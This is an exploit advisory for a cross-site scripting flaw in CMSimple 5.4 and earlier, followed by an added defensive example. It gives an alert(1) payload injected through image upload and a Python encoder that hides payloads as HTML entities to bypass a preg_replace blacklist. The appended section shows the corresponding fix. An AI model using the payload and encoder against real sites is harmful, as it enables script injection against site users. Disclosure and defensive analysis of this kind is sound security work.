# Exploit Title: CMSimple 5.4 - Cross Site Scripting (XSS)
# Date: 22/10/2021
# Exploit Author: heinjame
# Vendor Homepage: https://www.cmsimple.org/en/
# Software Link: https://www.cmsimple.org/en/?Downloads
# Version: <=5.4
# Tested on: Linux os

[Description]
Since the application filters user input with preg_replace, an attacker can bypass the restriction by encoding the payload as HTML numeric character references (HTML to Unicode encoding, &#NN; per character): the regex never sees the forbidden characters, but the browser decodes them before executing the handler.
So the application lets an attacker perform DOM based XSS.

[Payload and POC]
File > images > Upload a file
Attack vector >> ')-alert(1)// (needs to be encoded with the script below) >> ')-alert(1)//
When the victim clicks the delete button, an alert will be executed.
Script to encode the payload:

# Read the raw payload from stdin and emit it as HTML numeric character
# references (&#NN;), one per character, so a character blacklist applied
# with preg_replace does not match.
payload = input()
finalpayload = ""
for i in payload:
    finalpayload = finalpayload + "&#" + str(ord(i)) + ";"
print(finalpayload)
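The following is an added example, not part of the original advisory and not CMSimple's code, showing from the defender's side why a regex character blacklist fails against the encoding above and what a fixed handler looks like. The blacklist pattern, the deleteImage() onclick template and the filename allowlist are assumptions constructed for illustration.

```python
import html
import json
import re

# Constructed stand-in for a preg_replace-style character blacklist; the real
# CMSimple 5.4 pattern is not shown in the advisory, so this is an assumption.
BLACKLISTED = re.compile(r"""['"()<>]""")


def blacklist_filter(value: str) -> str:
    """Strips quotes, parentheses and angle brackets from the raw input only."""
    return BLACKLISTED.sub("", value)


def html_entity_encode(value: str) -> str:
    """Same transformation as the advisory's encoder: every char becomes &#NN;"""
    return "".join(f"&#{ord(c)};" for c in value)


def as_browser_sees_attribute(attr_value: str) -> str:
    """Browsers entity-decode an attribute value before the JS engine runs it."""
    return html.unescape(attr_value)


def vulnerable_onclick(filename: str) -> str:
    """Hypothetical vulnerable pattern: filtered name dropped into a JS string."""
    return f"deleteImage('{blacklist_filter(filename)}')"


def hardened_onclick(filename: str):
    """Decode first, allowlist the decoded value, then JS-encode and
    attribute-encode it. Returns None when the filename is rejected."""
    decoded = html.unescape(filename)
    if not re.fullmatch(r"[A-Za-z0-9_][A-Za-z0-9._-]{0,63}", decoded):
        return None
    return html.escape(f"deleteImage({json.dumps(decoded)})", quote=True)


if __name__ == "__main__":
    raw = "')-alert(1)//"  # the advisory's attack vector
    encoded = html_entity_encode(raw)
    print("raw after filter:     ", blacklist_filter(raw))
    print("encoded passes filter:", blacklist_filter(encoded) == encoded)
    print("JS the browser runs:  ", as_browser_sees_attribute(vulnerable_onclick(encoded)))
    print("hardened, payload:    ", hardened_onclick(encoded))
    print("hardened, logo.png:   ", as_browser_sees_attribute(hardened_onclick("logo.png")))
```

The key point is the order of operations: validation must run on the decoded value, and the output must be encoded for both the JavaScript string context and the HTML attribute context rather than relying on a character blacklist.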